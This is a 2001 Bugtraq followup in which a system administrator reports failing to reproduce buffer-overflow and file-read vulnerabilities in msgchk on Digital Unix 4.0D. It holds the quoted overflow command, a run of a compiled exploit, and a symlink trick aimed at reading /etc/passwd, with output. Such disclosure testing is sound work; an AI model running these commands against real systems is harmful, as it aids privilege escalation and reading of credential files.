[Resend: my original reply to Bugtraq on Monday 10th has not appeared, and I haven't seen any other followup; this time I've replaced all weird > ASCII 127 characters in my screen dumps by X's in case that prevented my email's handling by some MTA somewhere] On 10 September 2001 03:54, SeungHyun Seo said : > there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on digital > unix 4.0x. it's a mail utility - check for messages (only available within the > message handlin system, mh) [...] > /usr/bin/mh/msgchk is affected to buffer overflow vulnerability > > -- snip -- > $ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'` > AAAAAAAAAAAAA ... ... > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA : > msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ... > AAAAAAAAAAAAAAAAAAAAAAA > Memory fault(coredump) > -- snip -- NOT confirmed. On my system (Digital Unix 4.0D, Patch Kit 5) this gives me : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... AAAAAAAAAAAAAA : msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA followed by another command prompt. And the exploit doesn't work : /usr/users/joesoap/bin>cc msgbreak.c -o msgbreak -std /usr/users/joesoap/bin>msgbreak I'm going to create the standard MH path for you. AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .... [lots of pairs of "G" followed by "y" with an upsilon accent] XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .... [even more A's] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA XX : msgchk: no such user as AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX /usr/users/joesoap/bin>whoami joesoap /usr/users/joesoap/bin>uname -a OSF1 mybox V4.0 878 alpha (Lines wrapped for readability, and unprintable blobs replaced by X's.) Looks like there must have been a patch for this somewhere in Patch Kits 1 thru 5. Or maybe the hole only exists *prior* to 4.0D. Part 2: > Next , /usr/bin/mh/msgchk has a vulnerability that anyone read 1 line > of the unprivileged file on the system it's a old bug on redhat linux 2.0, > but it also works on digital unix 4.0x This hole doesn't work either : /usr/users/joesoap>ln -sf /etc/passwd ./~mh_profile /usr/users/joesoap>/usr/bin/mh/msgchk joesoap : No file-source mail waiting; last read on Wed, 27 Sep 2000 17:48:21 BST /usr/users/joesoap>head -2 ./~mh_profile root:xxxxxxxxxxxxx:0:1:system PRIVILEGED account:/:/bin/csh nobody:*Nologin:65534:65534:anonymous NFS user:/: Nick Boyce EDS, Bristol, UK
